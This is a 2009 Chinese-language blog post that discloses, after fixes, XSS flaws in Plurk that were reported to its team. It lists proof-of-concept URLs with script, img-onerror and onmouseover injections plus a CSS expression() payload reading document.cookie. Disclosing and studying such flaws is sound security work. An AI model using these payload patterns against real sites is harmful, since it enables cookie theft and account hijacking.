2009/06/28

Plurk 一些漏洞揭露

紀念今天拿到 Karma 100,來把 Plurk 已經修復的漏洞講一下。
跟站長幾個月前就溝通來往好久了,不記錄一下自己都快忘記了。
就目前手上有記錄的幾個貼上來記錄一下...



還沒修補的幾個就留著等 A-Team 修補完畢囉!

XSS
http://www.plurk.com/m/ 幾乎都有 XSS 問題http://www.plurk.com/Notifications/?page=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.plurk.com/Users/confirmEmail?user=%3Cscript%3Ealert(/x/)%3b%3C/script%3E&key=x&email=z

http://www.plurk.com/m/s/?query=a%22%3E%3Cimg%20src=%22aaa%22%20onerror=%22javascript:alert('a')%3b%22%3E%3C%22

與訊息有關皆有onmouseover:  http://allenown.blogspot.com/"onmouseover="alert('XD');" ( http://allenown.blogspot.com )

Custom CSS:  body{ background-url: ex/**/pression(alert(document.cookie)); }

還有一些 CSRF 因為還需要修正就先不記錄了。
等跟站長們討論過後再來更新這篇。:D

很感謝 Plurk 團隊 A-Team 一直願意修補這些問題,在 Plurk Birthday Party 上 Alvin 也說很感謝我們沒有先在網路上揭露這些問題,並且拿來進行攻擊。
希望 Plurk 能夠越來越完美。:)

No comments:

Post a Comment